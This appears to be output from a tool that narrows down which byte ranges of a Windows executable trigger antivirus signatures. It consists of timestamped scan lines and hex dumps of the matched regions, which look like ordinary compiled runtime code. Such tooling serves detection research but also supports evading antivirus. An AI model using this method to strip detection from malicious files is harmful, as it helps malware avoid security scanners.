[INFO    ][2023-07-21 13:34:42,834] _scanDataPart() :: Result: 12720-12856 (136 bytes)
000031B0   01 EB 0A 83 49 20 20 EB 04 83 49 20 02 B0 01 C3    ....I  ...I ....
000031C0   E8 39 00 00 00 84 C0 75 13 E8 DD 2D 00 00 C7 00    .9.....u...-....
000031D0   16 00 00 00 E8 15 2D 00 00 32 C0 C3 B0 01 C3 E8    ......-..2......
000031E0   44 00 00 00 84 C0 75 13 E8 BE 2D 00 00 C7 00 16    D.....u...-.....
000031F0   00 00 00 E8 F6 2C 00 00 32 C0 C3 B0 01 C3 8B FF    .....,..2.......
00003200   56 8B F1 0F B7 46 32 8D 8E 48 04 00 00 50 C6 46    V....F2..H...P.F
00003210   3C 01 E8 F6 0D 00 00 84 C0 74 05 FF 46 18 EB 04    <........t..F...
00003220   83 4E 18 FF B0 01 5E C3 8D 51 18 C6 41 3C 01 52    .N....^..Q..A<.R
00003230   0F B7 51 32 81 C1 48 04                            ..Q2..H.
[INFO    ][2023-07-21 13:34:44,421] _scanDataPart() :: Result: 16324-16392 (68b minChunk:64 X)
00003FC4   C3 B0 01 C3 8B FF 55 8B EC 8B D1 8B 0A 8B 41 08    ......U.......A.
00003FD4   3B 41 04 8B 45 0C 75 14 80 79 0C 00 74 04 FF 00    ;A..E.u..y..t...
00003FE4   EB 03 83 08 FF 8B 02 8A 40 0C EB 19 FF 00 8B 02    ........@.......
00003FF4   FF 40 08 8B 02 8B 08 66 8B 45 08 66 89 01 8B 02    .@.....f.E.f....
00004004   83 00 02 B0                                        ....
[INFO    ][2023-07-21 13:34:45,296] _printStatus() :: Reducing: 336 chunks done, found 36 matches (121 added)
[INFO    ][2023-07-21 13:34:45,296] _scanDataPart() :: Result: 16392-16460 (68b minChunk:64 X)
00004008   01 5D C2 08 00 8B FF 55 8B EC 8B 01 8B 40 0C 90    .].....U.....@..
00004018   C1 E8 0C A8 01 74 0C 8B 01 83 78 04 00 75 04 B0    .....t....x..u..
00004028   01 EB 17 FF 31 FF 75 08 E8 42 40 00 00 59 59 B9    ....1.u..B@..YY.
00004038   FF FF 00 00 66 3B C1 0F 95 C0 5D C2 04 00 8B FF    ....f;....].....
00004048   55 8B EC 51                                        U..Q
[INFO    ][2023-07-21 13:34:46,021] _scanDataPart() :: Result: 17072-17208 (136 bytes)
000042B0   8B 45 08 0F B7 04 48 23 45 10 5D C3 33 C0 5D C3    .E....H#E.].3.].
000042C0   8B FF 55 8B EC 83 EC 38 8B 45 1C 8B 4D 10 8B 55    ..U....8.E..M..U
000042D0   14 89 45 EC 8B 45 18 89 45 F4 8B 45 08 89 45 DC    ..E..E..E..E..E.
000042E0   8B 45 0C 89 55 F0 89 4D F8 89 45 E0 85 C9 75 15    .E..U..M..E...u.
000042F0   E8 B6 1C 00 00 C7 00 16 00 00 00 E8 EE 1B 00 00    ................
00004300   83 C8 FF C9 C3 85 D2 74 E7 8D 45 F8 89 4D E8 89    .......t..E..M..
00004310   45 C8 8D 45 F4 89 45 CC 8D 45 DC 89 45 D0 8D 45    E..E..E..E..E..E
00004320   F0 89 45 D4 8D 45 EC 89 45 D8 8D 45 E8 50 8D 45    ..E..E..E..E.P.E
00004330   C8 89 4D E4 50 8D 45 E4                            ..M.P.E.
[INFO    ][2023-07-21 13:34:46,878] _scanDataPart() :: Result: 17208-17276 (68b minChunk:64 X)
00004338   50 8D 4D FF E8 4B E3 FF FF C9 C3 8B FF 55 8B EC    P.M..K.......U..
00004348   FF 75 20 FF 75 1C FF 75 18 FF 75 14 FF 75 10 FF    .u .u..u..u..u..
00004358   75 0C FF 75 08 E8 85 E3 FF FF 83 C4 1C 5D C3 8B    u..u.........]..
00004368   FF 55 8B EC 51 FF 75 08 C7 45 FC 00 00 00 00 8B    .U..Q.u..E......
00004378   45 FC E8 9C                                        E...
[INFO    ][2023-07-21 13:34:47,566] _scanDataPart() :: Result: 17616-17752 (136 bytes)
000044D0   FF D7 8B 45 FC 59 89 46 04 E9 0F FF FF FF 33 C0    ...E.Y.F......3.
000044E0   5F 5E 5B C9 C3 A1 D4 AC 41 00 C3 8B FF 55 8B EC    _^[.....A....U..
000044F0   8B 45 08 A3 D4 AC 41 00 5D C3 8B FF 55 8B EC A1    .E....A.]...U...
00004500   04 A0 41 00 83 E0 1F 6A 20 59 2B C8 8B 45 08 D3    ..A....j Y+..E..
00004510   C8 33 05 04 A0 41 00 5D C3 A1 04 A0 41 00 8B C8    .3...A.]....A...
00004520   33 05 D8 AC 41 00 83 E1 1F D3 C8 85 C0 0F 95 C0    3...A...........
00004530   C3 8B FF 55 8B EC 8B 45 08 A3 D8 AC 41 00 5D C3    ...U...E....A.].
00004540   8B FF 55 8B EC 56 8B 35 04 A0 41 00 8B CE 33 35    ..U..V.5..A...35
00004550   D8 AC 41 00 83 E1 1F D3                            ..A.....
[INFO    ][2023-07-21 13:34:47,567] _printStatus() :: Reducing: 346 chunks done, found 38 matches (125 added)
[INFO    ][2023-07-21 13:34:48,258] _scanDataPart() :: Result: 17752-17888 (136 bytes)
00004558   CE 85 F6 75 04 33 C0 EB 0E FF 75 08 8B CE FF 15    ...u.3....u.....
00004568   20 21 41 00 FF D6 59 5E 5D C3 8B FF 55 8B EC FF     !A...Y^]...U...
00004578   75 08 E8 7B FF FF FF 59 A3 D8 AC 41 00 5D C3 8B    u..{...Y...A.]..
00004588   FF 55 8B EC 83 EC 10 53 8B 5D 08 85 DB 75 07 33    .U.....S.]...u.3
00004598   C0 E9 15 01 00 00 56 83 FB 02 74 1B 83 FB 01 74    ......V...t....t
000045A8   16 E8 FD 19 00 00 6A 16 5E 89 30 E8 36 19 00 00    ......j.^.0.6...
000045B8   8B C6 E9 F3 00 00 00 57 68 04 01 00 00 BE E0 AC    .......Wh.......
000045C8   41 00 33 FF 56 57 FF 15 88 20 41 00 A1 1C AF 41    A.3.VW... A....A
000045D8   00 89 35 08 AF 41 00 89                            ..5..A..
[INFO    ][2023-07-21 13:34:48,941] _scanDataPart() :: Result: 17888-18024 (136 bytes)
000045E0   45 F0 85 C0 74 05 66 39 38 75 05 8B C6 89 75 F0    E...t.f98u....u.
000045F0   8D 4D F4 89 7D FC 51 8D 4D FC 89 7D F4 51 57 57    .M..}.Q.M..}.QWW
00004600   50 E8 B0 00 00 00 6A 02 FF 75 F4 FF 75 FC E8 37    P.....j..u..u..7
00004610   02 00 00 8B F0 83 C4 20 85 F6 75 0C E8 8A 19 00    ....... ..u.....
00004620   00 6A 0C 5F 89 38 EB 32 8D 45 F4 50 8D 45 FC 50    .j._.8.2.E.P.E.P
00004630   8B 45 FC 8D 04 86 50 56 FF 75 F0 E8 76 00 00 00    .E....PV.u..v...
00004640   83 C4 14 83 FB 01 75 16 8B 45 FC 48 A3 0C AF 41    ......u..E.H...A
00004650   00 8B C6 8B F7 A3 14 AF 41 00 8B DF EB 4A 8D 45    ........A....J.E
00004660   F8 89 7D F8 50 56 E8 06                            ..}.PV..
[INFO    ][2023-07-21 13:34:49,637] _scanDataPart() :: Result: 18024-18160 (136 bytes)
00004668   43 00 00 8B D8 59 59 85 DB 74 05 8B 45 F8 EB 26    C....YY..t..E..&
00004678   8B 55 F8 8B CF 8B C2 39 3A 74 08 8D 40 04 41 39    .U.....9:t..@.A9
00004688   38 75 F8 8B C7 89 0D 0C AF 41 00 89 45 F8 8B DF    8u.......A..E...
00004698   89 15 14 AF 41 00 50 E8 77 19 00 00 59 89 7D F8    ....A.P.w...Y.}.
000046A8   56 E8 6D 19 00 00 59 8B C3 5F 5E 5B C9 C3 8B FF    V.m...Y.._^[....
000046B8   55 8B EC 8B 45 14 83 EC 10 8B 4D 08 8B 55 10 56    U...E.....M..U.V
000046C8   8B 75 0C 57 8B 7D 18 83 27 00 C7 00 01 00 00 00    .u.W.}..'.......
000046D8   85 F6 74 08 89 16 83 C6 04 89 75 0C 53 32 DB C7    ..t.......u.S2..
000046E8   45 F8 20 00 00 00 C7 45                            E. ....E
[INFO    ][2023-07-21 13:34:49,638] _printStatus() :: Reducing: 351 chunks done, found 38 matches (128 added)
[INFO    ][2023-07-21 13:34:49,638] _scanDataPart() :: Result: 18160-18296 (136 bytes)
000046F0   F4 09 00 00 00 6A 22 58 66 39 01 75 0A 84 DB 0F    .....j"Xf9.u....
00004700   94 C3 83 C1 02 EB 1A FF 07 85 D2 74 09 66 8B 01    ...........t.f..
00004710   66 89 02 83 C2 02 0F B7 01 83 C1 02 66 85 C0 74    f...........f..t
00004720   1F 84 DB 75 D0 66 3B 45 F8 74 09 66 3B 45 F4 6A    ...u.f;E.t.f;E.j
00004730   22 58 75 C4 85 D2 74 0B 33 C0 66 89 42 FE EB 03    "Xu...t.3.f.B...
00004740   83 E9 02 C6 45 FF 00 0F B7 01 8B F8 66 85 C0 74    ....E.......f..t
00004750   19 8B 5D F8 66 3B C3 74 09 0F B7 F8 66 3B 45 F4    ..].f;.t....f;E.
00004760   75 08 83 C1 02 0F B7 01 EB EA 66 85 FF 0F 84 C6    u.........f.....
00004770   00 00 00 85 F6 74 08 89                            .....t..
[INFO    ][2023-07-21 13:34:50,315] _scanDataPart() :: Result: 18432-18568 (136 bytes)
00004800   F8 74 20 66 3B 45 F4 74 1A 83 7D F0 00 74 0C 85    .t f;E.t..}..t..
00004810   D2 74 06 66 89 02 83 C2 02 FF 07 83 C1 02 E9 64    .t.f...........d
00004820   FF FF FF 8B 75 0C 85 D2 74 08 33 C0 66 89 02 83    ....u...t.3.f...
00004830   C2 02 FF 07 E9 0E FF FF FF 5B 85 F6 74 03 83 26    .........[..t..&
00004840   00 8B 45 14 5F 5E FF 00 C9 C3 8B FF 55 8B EC 56    ..E._^......U..V
00004850   8B 75 08 81 FE FF FF FF 3F 73 39 83 C8 FF 8B 4D    .u......?s9....M
00004860   0C 33 D2 F7 75 10 3B C8 73 2A 0F AF 4D 10 C1 E6    .3..u.;.s*..M...
00004870   02 8B C6 F7 D0 3B C1 76 1B 8D 04 0E 6A 01 50 E8    .....;.v....j.P.
00004880   3A 17 00 00 6A 00 8B F0                            :...j...
[INFO    ][2023-07-21 13:34:51,025] _scanDataPart() :: Result: 18568-18704 (136 bytes)
00004888   E8 8E 17 00 00 83 C4 0C 8B C6 EB 02 33 C0 5E 5D    ............3.^]
00004898   C3 8B FF 55 8B EC 5D E9 E3 FC FF FF A1 F0 AE 41    ...U..]........A
000048A8   00 85 C0 75 22 39 05 EC AE 41 00 74 18 E8 16 00    ...u"9...A.t....
000048B8   00 00 85 C0 74 09 E8 97 01 00 00 85 C0 75 06 A1    ....t........u..
000048C8   F0 AE 41 00 C3 33 C0 C3 83 3D F0 AE 41 00 00 74    ..A..3...=..A..t
000048D8   03 33 C0 C3 56 57 E8 EA 49 00 00 8B F0 85 F6 75    .3..VW..I......u
000048E8   05 83 CF FF EB 24 56 E8 2A 00 00 00 59 85 C0 75    .....$V.*...Y..u
000048F8   05 83 CF FF EB 0C A3 F4 AE 41 00 33 FF A3 F0 AE    .........A.3....
00004908   41 00 6A 00 E8 0A 17 00                            A.j.....
[INFO    ][2023-07-21 13:34:53,322] _scanDataPart() :: Result: 18704-18840 (136 bytes)
00004910   00 59 56 E8 03 17 00 00 59 8B C7 5F 5E C3 8B FF    .YV.....Y.._^...
00004920   55 8B EC 83 EC 0C 53 8B 5D 08 33 C0 89 45 FC 8B    U.....S.].3..E..
00004930   D0 56 57 0F B7 03 8B F3 66 85 C0 74 33 6A 3D 8B    .VW.....f..t3j=.
00004940   C8 5B 66 3B CB 74 01 42 8B CE 8D 79 02 66 8B 01    .[f;.t.B...y.f..
00004950   83 C1 02 66 3B 45 FC 75 F4 2B CF D1 F9 8D 34 4E    ...f;E.u.+....4N
00004960   83 C6 02 0F B7 06 8B C8 66 85 C0 75 D5 8B 5D 08    ........f..u..].
00004970   8D 42 01 6A 04 50 E8 43 16 00 00 8B F8 59 59 85    .B.j.P.C.....YY.
00004980   FF 0F 84 87 00 00 00 0F B7 03 89 7D F8 66 85 C0    ...........}.f..
00004990   74 7C 8B D0 8B CB 8D 71                            t|.....q
[INFO    ][2023-07-21 13:34:53,323] _printStatus() :: Reducing: 364 chunks done, found 39 matches (132 added)
[INFO    ][2023-07-21 13:34:53,992] _scanDataPart() :: Result: 18840-18976 (136 bytes)
00004998   02 66 8B 01 83 C1 02 66 3B 45 FC 75 F4 2B CE D1    .f.....f;E.u.+..
000049A8   F9 6A 3D 8D 41 01 59 89 45 F4 66 3B D1 74 38 6A    .j=.A.Y.E.f;.t8j
000049B8   02 50 E8 FF 15 00 00 8B F0 59 59 85 F6 74 37 53    .P.......YY..t7S
000049C8   FF 75 F4 56 E8 55 39 00 00 83 C4 0C 85 C0 75 46    .u.V.U9.......uF
000049D8   8B 45 F8 89 30 83 C0 04 89 45 F8 33 C0 50 E8 30    .E..0....E.3.P.0
000049E8   16 00 00 8B 45 F4 59 8D 1C 43 0F B7 03 8B D0 66    ....E.Y..C.....f
000049F8   85 C0 75 98 EB 10 57 E8 27 00 00 00 33 FF 57 E8    ..u...W.'...3.W.
00004A08   0F 16 00 00 59 59 33 C0 50 E8 05 16 00 00 59 8B    ....YY3.P.....Y.
00004A18   C7 5F 5E 5B C9 C3 33 C0                            ._^[..3.
[INFO    ][2023-07-21 13:34:54,680] _scanDataPart() :: Result: 19248-19384 (136 bytes)
00004B30   FE FF FF 59 5D C3 E9 69 FD FF FF 68 00 57 40 00    ...Y]..i...h.W@.
00004B40   B9 EC AE 41 00 E8 8D FF FF FF 68 1B 57 40 00 B9    ...A......h.W@..
00004B50   F0 AE 41 00 E8 7E FF FF FF FF 35 F8 AE 41 00 E8    ..A..~....5..A..
00004B60   C7 FE FF FF FF 35 F4 AE 41 00 E8 BC FE FF FF 59    .....5..A......Y
00004B70   59 C3 A1 F4 AE 41 00 85 C0 75 0A E8 24 FD FF FF    Y....A...u..$...
00004B80   A3 F4 AE 41 00 C3 E9 45 FD FF FF 8B FF 55 8B EC    ...A...E.....U..
00004B90   51 8B 45 0C 53 56 8B 75 08 2B C6 83 C0 03 57 33    Q.E.SV.u.+....W3
00004BA0   FF C1 E8 02 39 75 0C 1B DB F7 D3 23 D8 74 1C 8B    ....9u.....#.t..
00004BB0   06 89 45 FC 85 C0 74 0B                            ..E...t.
[INFO    ][2023-07-21 13:34:55,311] _scanDataPart() :: Result: 19384-19520 (136 bytes)
00004BB8   8B C8 FF 15 20 21 41 00 FF 55 FC 83 C6 04 47 3B    .... !A..U....G;
00004BC8   FB 75 E4 5F 5E 5B C9 C3 8B FF 55 8B EC 56 8B 75    .u._^[....U..V.u
00004BD8   08 57 EB 17 8B 3E 85 FF 74 0E 8B CF FF 15 20 21    .W...>..t..... !
00004BE8   41 00 FF D7 85 C0 75 0A 83 C6 04 3B 75 0C 75 E4    A.....u....;u.u.
00004BF8   33 C0 5F 5E 5D C3 6A 08 68 A8 8F 41 00 E8 E6 C7    3._^].j.h..A....
00004C08   FF FF 8B 45 08 FF 30 E8 D8 4A 00 00 59 83 65 FC    ...E..0..J..Y.e.
00004C18   00 8B 4D 0C E8 2A 00 00 00 C7 45 FC FE FF FF FF    ..M..*....E.....
00004C28   E8 12 00 00 00 8B 4D F0 64 89 0D 00 00 00 00 59    ......M.d......Y
00004C38   5F 5E 5B C9 C2 0C 00 8B                            _^[.....
[INFO    ][2023-07-21 13:34:55,312] _scanDataPart() :: Result: 19996-20064 (68b minChunk:64 X)
00004E1C   00 FF D6 5E 83 7D FC 00 74 09 FF 75 FC FF 15 70    ...^.}..t..u...p
00004E2C   20 41 00 C9 C3 8B FF 55 8B EC 8B 45 08 A3 00 AF     A.....U...E....
00004E3C   41 00 5D C3 6A 01 6A 02 6A 00 E8 ED FE FF FF 83    A.].j.j.j.......
00004E4C   C4 0C C3 6A 01 6A 00 6A 00 E8 DE FE FF FF 83 C4    ...j.j.j........
00004E5C   0C C3 8B FF                                        ....
[INFO    ][2023-07-21 13:34:56,188] _printStatus() :: Reducing: 377 chunks done, found 41 matches (136 added)
[INFO    ][2023-07-21 13:34:56,188] _scanDataPart() :: Result: 20132-20200 (68b minChunk:64 X)
00004EA4   75 08 E8 8D FE FF FF 83 C4 0C 5D C3 8B FF 55 8B    u.........]...U.
00004EB4   EC 8B 45 08 3D 00 40 00 00 74 23 3D 00 80 00 00    ..E.=.@..t#=....
00004EC4   74 1C 3D 00 00 01 00 74 15 E8 D9 10 00 00 C7 00    t.=....t........
00004ED4   16 00 00 00 E8 11 10 00 00 6A 16 58 5D C3 B9 A4    .........j.X]...
00004EE4   B3 41 00 87                                        .A..
[INFO    ][2023-07-21 13:34:57,066] _scanDataPart() :: Result: 20200-20268 (68b minChunk:64 X)
00004EE8   01 33 C0 5D C3 FF 15 00 20 41 00 A3 18 AF 41 00    .3.].... A....A.
00004EF8   FF 15 98 20 41 00 A3 1C AF 41 00 B0 01 C3 B8 0C    ... A....A......
00004F08   AF 41 00 C3 B8 14 AF 41 00 C3 6A 0C 68 C8 8F 41    .A.....A..j.h..A
00004F18   00 E8 D2 C4 FF FF 8B 45 08 FF 30 E8 C4 47 00 00    .......E..0..G..
00004F28   59 83 65 FC                                        Y.e.
[INFO    ][2023-07-21 13:34:57,768] _scanDataPart() :: Result: 20336-20472 (136 bytes)
00004F70   C9 C2 0C 00 8B 45 10 FF 30 E8 B6 47 00 00 59 C3    .....E..0..G..Y.
00004F80   33 C0 B9 20 AF 41 00 40 87 01 C3 8B FF 55 8B EC    3.. .A.@.....U..
00004F90   83 EC 0C 6A 04 58 89 45 F8 8D 4D FF 89 45 F4 8D    ...j.X.E..M..E..
00004FA0   45 F8 50 8D 45 FF 50 8D 45 F4 50 E8 62 FF FF FF    E.P.E.P.E.P.b...
00004FB0   C9 C3 8B FF 55 8B EC 56 E8 CF 22 00 00 8B 55 08    ....U..V.."...U.
00004FC0   8B F0 6A 00 58 8B 8E 50 03 00 00 F6 C1 02 0F 94    ..j.X..P........
00004FD0   C0 40 83 FA FF 74 33 85 D2 74 36 83 FA 01 74 1F    .@...t3..t6...t.
00004FE0   83 FA 02 74 15 E8 C1 0F 00 00 C7 00 16 00 00 00    ...t............
00004FF0   E8 F9 0E 00 00 83 C8 FF                            ........
[INFO    ][2023-07-21 13:34:58,472] _scanDataPart() :: Result: 20472-20608 (136 bytes)
00004FF8   EB 17 83 E1 FD EB 03 83 C9 02 89 8E 50 03 00 00    ............P...
00005008   EB 07 83 0D 80 A7 41 00 FF 5E 5D C3 A1 24 AF 41    ......A..^]..$.A
00005018   00 90 C3 8B FF 55 8B EC 8B 45 08 85 C0 74 1A 83    .....U...E...t..
00005028   F8 01 74 15 E8 7A 0F 00 00 C7 00 16 00 00 00 E8    ..t..z..........
00005038   B2 0E 00 00 83 C8 FF 5D C3 B9 24 AF 41 00 87 01    .......]..$.A...
00005048   5D C3 B8 28 AF 41 00 C3 6A 0C 68 08 90 41 00 E8    ]..(.A..j.h..A..
00005058   94 C3 FF FF 83 65 E4 00 8B 45 08 FF 30 E8 82 46    .....e...E..0..F
00005068   00 00 59 83 65 FC 00 8B 4D 0C E8 B8 01 00 00 8B    ..Y.e...M.......
00005078   F0 89 75 E4 C7 45 FC FE                            ..u..E..
[INFO    ][2023-07-21 13:34:58,472] _printStatus() :: Reducing: 383 chunks done, found 43 matches (140 added)
[INFO    ][2023-07-21 13:34:59,179] _scanDataPart() :: Result: 20608-20744 (136 bytes)
00005080   FF FF FF E8 17 00 00 00 8B C6 8B 4D F0 64 89 0D    ...........M.d..
00005090   00 00 00 00 59 5F 5E 5B C9 C2 0C 00 8B 75 E4 8B    ....Y_^[.....u..
000050A0   45 10 FF 30 E8 8B 46 00 00 59 C3 6A 0C 68 E8 8F    E..0..F..Y.j.h..
000050B0   41 00 E8 39 C3 FF FF 83 65 E4 00 8B 45 08 FF 30    A..9....e...E..0
000050C0   E8 27 46 00 00 59 83 65 FC 00 8B 4D 0C E8 34 00    .'F..Y.e...M..4.
000050D0   00 00 8B F0 89 75 E4 C7 45 FC FE FF FF FF E8 17    .....u..E.......
000050E0   00 00 00 8B C6 8B 4D F0 64 89 0D 00 00 00 00 59    ......M.d......Y
000050F0   5F 5E 5B C9 C2 0C 00 8B 75 E4 8B 45 10 FF 30 E8    _^[.....u..E..0.
00005100   30 46 00 00 59 C3 8B FF                            0F..Y...
[INFO    ][2023-07-21 13:34:59,866] _scanDataPart() :: Result: 20744-20880 (136 bytes)
00005108   55 8B EC 83 EC 0C 8B C1 89 45 F8 53 56 8B 00 57    U........E.SV..W
00005118   8B 30 85 F6 0F 84 05 01 00 00 A1 04 A0 41 00 8B    .0...........A..
00005128   C8 8B 1E 83 E1 1F 8B 7E 04 33 D8 8B 76 08 33 F8    .......~.3..v.3.
00005138   33 F0 D3 CF D3 CE D3 CB 3B FE 0F 85 9D 00 00 00    3.......;.......
00005148   2B F3 B8 00 02 00 00 C1 FE 02 3B F0 77 02 8B C6    +.........;.w...
00005158   8D 3C 30 85 FF 75 03 6A 20 5F 3B FE 72 1D 6A 04    .<0..u.j _;.r.j.
00005168   57 53 E8 64 50 00 00 6A 00 89 45 FC E8 A2 0E 00    WS.dP..j..E.....
00005178   00 8B 4D FC 83 C4 10 85 C9 75 24 6A 04 8D 7E 04    ..M......u$j..~.
00005188   57 53 E8 44 50 00 00 6A                            WS.DP..j
[INFO    ][2023-07-21 13:35:00,566] _scanDataPart() :: Result: 20880-21016 (136 bytes)
00005190   00 89 45 FC E8 82 0E 00 00 8B 4D FC 83 C4 10 85    ..E.......M.....
000051A0   C9 0F 84 80 00 00 00 8D 04 B1 8B D9 89 45 FC 8D    .............E..
000051B0   34 B9 A1 04 A0 41 00 8B 7D FC 8B CF 89 45 F4 8B    4....A..}....E..
000051C0   C6 2B C7 83 C0 03 C1 E8 02 3B F7 1B D2 F7 D2 23    .+.......;.....#
000051D0   D0 74 12 8B 7D F4 33 C0 40 89 39 8D 49 04 3B C2    .t..}.3.@.9.I.;.
000051E0   75 F6 8B 7D FC 8B 45 F8 8B 40 04 FF 30 E8 08 F3    u..}..E..@..0...
000051F0   FF FF 53 89 07 E8 00 F3 FF FF 8B 5D F8 8B 0B 8B    ..S........]....
00005200   09 89 01 8D 47 04 50 E8 EE F2 FF FF 8B 0B 56 8B    ....G.P.......V.
00005210   09 89 41 04 E8 E1 F2 FF                            ..A.....
[INFO    ][2023-07-21 13:35:00,566] _printStatus() :: Reducing: 391 chunks done, found 43 matches (143 added)
[INFO    ][2023-07-21 13:35:01,780] _scanDataPart() :: Result: 21016-21084 (68b minChunk:64 X)
00005218   FF 8B 0B 83 C4 10 8B 09 89 41 08 33 C0 EB 03 83    .........A.3....
00005228   C8 FF 5F 5E 5B C9 C3 8B FF 55 8B EC 83 EC 14 53    .._^[....U.....S
00005238   8B D9 57 89 5D EC 8B 03 8B 38 85 FF 75 08 83 C8    ..W.]....8..u...
00005248   FF E9 B7 00 00 00 8B 15 04 A0 41 00 8B CA 56 8B    ..........A...V.
00005258   37 83 E1 1F                                        7...
[INFO    ][2023-07-21 13:35:02,600] _printStatus() :: Reducing: 396 chunks done, found 43 matches (144 added)
[INFO    ][2023-07-21 13:35:02,600] _scanDataPart() :: Result: 21220-21288 (68b minChunk:64 X)
000052E4   0D 00 00 8B 15 04 A0 41 00 59 8B 03 8B 00 89 10    .......A.Y......
000052F4   8B 03 8B 00 89 50 04 8B 03 8B 00 89 50 08 33 C0    .....P......P.3.
00005304   5E 5F 5B C9 C3 8B FF 55 8B EC FF 75 08 68 2C AF    ^_[....U...u.h,.
00005314   41 00 E8 5A 00 00 00 59 59 5D C3 8B FF 55 8B EC    A..Z...YY]...U..
00005324   83 EC 10 6A                                        ...j
[INFO    ][2023-07-21 13:35:03,288] _scanDataPart() :: Result: 21288-21424 (136 bytes)
00005328   02 8D 45 08 89 45 F4 8D 4D FF 58 89 45 F8 89 45    ..E..E..M.X.E..E
00005338   F0 8D 45 F8 50 8D 45 F4 50 8D 45 F0 50 E8 06 FD    ..E.P.E.P.E.P...
00005348   FF FF C9 C3 8B FF 55 8B EC 8B 4D 08 85 C9 75 05    ......U...M...u.
00005358   83 C8 FF 5D C3 8B 01 3B 41 08 75 0D A1 04 A0 41    ...]...;A.u....A
00005368   00 89 01 89 41 04 89 41 08 33 C0 5D C3 8B FF 55    ....A..A.3.]...U
00005378   8B EC 83 EC 14 8D 45 08 89 45 EC 8D 4D FF 6A 02    ......E..E..M.j.
00005388   8D 45 0C 89 45 F0 58 89 45 F8 89 45 F4 8D 45 F8    .E..E.X.E..E..E.
00005398   50 8D 45 EC 50 8D 45 F4 50 E8 05 FD FF FF C9 C3    P.E.P.E.P.......
000053A8   C7 05 38 B2 41 00 38 A1                            ..8.A.8.
[INFO    ][2023-07-21 13:35:03,991] _scanDataPart() :: Result: 21424-21560 (136 bytes)
000053B0   41 00 B0 01 C3 68 2C AF 41 00 E8 8D FF FF FF C7    A....h,.A.......
000053C0   04 24 38 AF 41 00 E8 81 FF FF FF 59 B0 01 C3 E8    .$8.A......Y....
000053D0   67 F7 FF FF B0 01 C3 8B FF 56 8B 35 04 A0 41 00    g........V.5..A.
000053E0   56 E8 95 0A 00 00 56 E8 08 4F 00 00 56 E8 8F 50    V.....V..O..V..P
000053F0   00 00 56 E8 39 F1 FF FF 56 E8 33 FA FF FF 83 C4    ..V.9...V.3.....
00005400   14 B0 01 5E C3 6A 00 E8 D1 C3 FF FF 59 C3 8B FF    ...^.j......Y...
00005410   55 8B EC 51 68 44 B2 41 00 8D 4D FF E8 54 00 00    U..QhD.A..M..T..
00005420   00 B0 01 C9 C3 8B FF 56 FF 35 30 B2 41 00 E8 E8    .......V.50.A...
00005430   0B 00 00 FF 35 34 B2 41                            ....54.A
[INFO    ][2023-07-21 13:35:03,992] _scanDataPart() :: Doubling: minChunkSize: 64  minMatchSize: 128
[INFO    ][2023-07-21 13:35:03,992] _scanDataPart() :: Result: 21560-21696 (136b minChunk:128 X)
00005438   00 33 F6 89 35 30 B2 41 00 E8 D5 0B 00 00 FF 35    .3..50.A.......5
00005448   10 AF 41 00 89 35 34 B2 41 00 E8 C4 0B 00 00 FF    ..A..54.A.......
00005458   35 14 AF 41 00 89 35 10 AF 41 00 E8 B3 0B 00 00    5..A..5..A......
00005468   83 C4 10 89 35 14 AF 41 00 B0 01 5E C3 8B FF 55    ....5..A...^...U
00005478   8B EC 56 8B 75 08 83 C9 FF 8B 06 F0 0F C1 08 75    ..V.u..........u
00005488   15 57 BF 00 A2 41 00 39 3E 74 0A FF 36 E8 81 0B    .W...A.9>t..6...
00005498   00 00 59 89 3E 5F 5E 5D C2 04 00 68 98 31 41 00    ..Y.>_^]...h.1A.
000054A8   68 18 31 41 00 E8 A9 4D 00 00 59 59 C3 8B FF 55    h.1A...M..YY...U
000054B8   8B EC 80 7D 08 00 74 12                            ...}..t.
[INFO    ][2023-07-21 13:35:03,993] _scanDataPart() :: Result: 21696-21832 (136b minChunk:128 X)
000054C0   83 3D CC AC 41 00 00 74 05 E8 2A 13 00 00 B0 01    .=..A..t..*.....
000054D0   5D C3 68 98 31 41 00 68 18 31 41 00 E8 E2 4D 00    ].h.1A.h.1A...M.
000054E0   00 59 59 5D C3 8B FF 55 8B EC 8B 4D 10 8B 45 0C    .YY]...U...M..E.
000054F0   81 E1 FF FF F7 FF 23 C1 56 8B 75 08 A9 E0 FC F0    ......#.V.u.....
00005500   FC 74 24 85 F6 74 0D 6A 00 6A 00 E8 07 53 00 00    .t$..t.j.j...S..
00005510   59 59 89 06 E8 92 0A 00 00 6A 16 5E 89 30 E8 CB    YY.......j.^.0..
00005520   09 00 00 8B C6 EB 1A 51 FF 75 0C 85 F6 74 09 E8    .......Q.u...t..
00005530   E3 52 00 00 89 06 EB 05 E8 DA 52 00 00 59 59 33    .R........R..YY3
00005540   C0 5E 5D C3 6A 08 68 28                            .^].j.h(
[INFO    ][2023-07-21 13:35:03,995] _scanDataPart() :: Result: 24144-24280 (136b minChunk:128 X)
00005E50   50 FF 15 0C 20 41 00 85 C0 75 13 85 FF 75 0F 83    P... A...u...u..
00005E60   7D 08 FF 74 09 FF 75 08 E8 16 B5 FF FF 59 8B 4D    }..t..u......Y.M
00005E70   FC 33 CD 5F E8 60 AC FF FF C9 C3 8B FF 55 8B EC    .3._.`.......U..
00005E80   8B 45 08 A3 44 AF 41 00 5D C3 8B FF 55 8B EC 56    .E..D.A.]...U..V
00005E90   E8 4E 15 00 00 85 C0 74 29 8B B0 5C 03 00 00 85    .N.....t)..\....
00005EA0   F6 74 1F FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF    .t..u..u..u..u..
00005EB0   75 08 8B CE FF 15 20 21 41 00 FF D6 83 C4 14 5E    u..... !A......^
00005EC0   5D C3 FF 75 18 8B 35 04 A0 41 00 8B CE FF 75 14    ]..u..5..A....u.
00005ED0   33 35 44 AF 41 00 83 E1                            35D.A...
[INFO    ][2023-07-21 13:35:03,997] _scanDataPart() :: Result: 24416-24688 (272 bytes)
00005F60   59 3B C8 1B C0 23 C1 83 C0 08 5D C3 8B 04 C5 9C    Y;...#....].....
00005F70   31 41 00 5D C3 8B FF 55 8B EC 56 E8 18 00 00 00    1A.]...U..V.....
00005F80   8B 4D 08 51 89 08 E8 A7 FF FF FF 59 8B F0 E8 18    .M.Q.......Y....
00005F90   00 00 00 89 30 5E 5D C3 E8 46 14 00 00 85 C0 75    ....0^]..F.....u
00005FA0   06 B8 F4 A0 41 00 C3 83 C0 14 C3 E8 33 14 00 00    ....A.......3...
00005FB0   85 C0 75 06 B8 F0 A0 41 00 C3 83 C0 10 C3 8B FF    ..u....A........
00005FC0   55 8B EC 56 8B 75 08 85 F6 74 0C 6A E0 33 D2 58    U..V.u...t.j.3.X
